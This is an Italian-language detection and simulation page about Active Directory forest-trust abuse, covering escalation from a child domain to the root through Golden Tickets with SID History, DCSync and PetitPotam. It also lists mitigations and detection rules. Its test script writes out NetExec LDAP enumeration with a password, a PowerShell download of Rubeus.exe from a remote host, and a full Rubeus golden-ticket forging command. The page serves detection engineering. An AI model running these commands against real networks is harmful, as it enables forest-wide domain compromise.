Abuso della Trust della Foresta di Active Directory e Escalation da Figlio a Radice
Detection stack
- AIDR
- Alert
- ETL
- Query
Sommario
Questo walkthrough tecnico mostra come un aggressore con privilegi di Domain Admin in un dominio figlio possa scalare al controllo amministrativo della radice della foresta. L’attacco abusa dei trust bidirezionali intra-foresta e del filtro SID permissivo per iniettare SID di Enterprise Admin in ticket Kerberos contraffatti. Viene spiegato anche come utilizzare metodi di coercizione come PetitPotam per catturare i ticket degli account macchina e abilitare attacchi DCSync.
Indagine
Il rapporto descrive un impegno basato su laboratorio in cui l’aggressore inizia nel dominio figlio pentest.ignite.local La procedura include enumerare i trust della foresta, estrarre l’hash del krbtgt , forgiando un Golden Ticket con SID History, ed eseguendo un attacco DCSync contro il dominio principale ignite.local . Viene anche dimostrato un percorso di escalation secondario utilizzando la tecnica di coercizione PetitPotam.
Mitigazione
Le mitigazioni raccomandate includono trattare tutti i controller di dominio come asset di livello zero e ruotare la krbtgt password due volte su base regolare in tutta la foresta. Le organizzazioni dovrebbero far rispettare il filtro SID sui trust, disabilitare la delega senza restrizioni e disattivare il servizio Print Spooler sui controller di dominio. Ulteriori passaggi di rafforzamento includono l’uso del gruppo Utenti Protetti per la protezione Kerberos e il monitoraggio dell’attività di replica DRSUAPI anormale.
Risposta
Se viene rilevata attività DCSync o uso non autorizzato di ticket Kerberos, i rispondenti dovrebbero isolare immediatamente i controller di dominio interessati e cominciare un doppio krbtgt reset della password. Tutti gli account con privilegi di Enterprise Admin dovrebbero essere investigati e l’ambiente dovrebbe essere controllato per strumenti come Rubeus o PetitPotam. I log di autenticazione dovrebbero essere revisionati per comportamenti insoliti degli account macchina ed eventi possibili legati alla coercizione.
Flow degli Attacchi
Rilevamenti
Probabile Uso di Hacktools di Windows [Parte3] (via file_event)
Visualizza
Rilevamento Abuso di Trust della Foresta di Active Directory [Log di Sicurezza di Microsoft Windows]
Visualizza
Abuso di Trust della Foresta di Active Directory: Escalation da Dominio Figlio a Radice [Creazione Processi di Windows]
Visualizza
Esecuzione della Simulazione
Prerequisito: Il Controllo Pre-flight della Base di Riferimento e della Telemetria deve essere passato.
Motivo: Questa sezione dettaglia l’esecuzione precisa della tecnica dell’avversario (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente i TTP identificati e mirare a generare l’esatta telemetria prevista dalla logica di rilevamento. Esempi astratti o non correlati porteranno a diagnosi errate.
-
Narrazione & Comandi dell’Attacco: L’avversario ha ottenuto un punto d’appoggio in un dominio figlio (
dominio figlio pentest.ignite.local). Per scalare alla radice della foresta, utilizza primanxc(NetExec) per elencare i Controller di Dominio tramite LDAP per mappare l’ambiente target. Successivamente, usapowershellper scaricareRubeus.exeda un server remoto controllato dall’attaccante. Infine, esegueRubeus.exeper forgiare un Golden Ticket. Il biglietto forgiato contiene il SID del dominio radice della foresta (S-1-5-21-2964257136-1039789743-457275023) per permettere all’avversario di impersonare un amministratore della foresta durante l’interazione con il dominio radice. -
Script di Test di Regressione:
# Simulazione di Abuso di Trust della Foresta per attivare la regola Sigma specifica # 1. Simula Enumerazione LDAP NetExec # Nota: chiamiamo 'nxc' tramite un'esecuzione fittizia per simulare la firma della riga di comando Start-Process "cmd.exe" -ArgumentList "/c nxc ldap -u raaz -p Password@2 --dc-list" -NoNewWindow # 2. Simula Download di Rubeus via PowerShell # Questo corrisponde alla stringa esatta: 'powershell wget http://Rubeus.exe -o Rubeus.exe' Start-Process "powershell.exe" -ArgumentList "wget http://Rubeus.exe -o Rubeus.exe" -NoNewWindow # 3. Simula la Falsificazione del Golden Ticket di Rubeus # Questo corrisponde all'esatta stringa complessa richiesta dalla regola di rilevamento $rubeusCmd = "Rubeus.exe golden /rc4: /user:administrator /domain:pentest.ignite.local /sid:S-1-5-21-3430543386-541733547-1396883976 /sids:S-1-5-21-2964257136-1039789743-457275023-519 /outfile:ticket" Start-Process "cmd.exe" -ArgumentList "/c $rubeusCmd" -NoNewWindow -
Comandi di Pulizia:
# Rimuovi il file Rubeus scaricato e qualsiasi artefatto fittizio Remove-Item -Path "Rubeus.exe" -ErrorAction SilentlyContinue Remove-Item -Path "ticket" -ErrorAction SilentlyContinue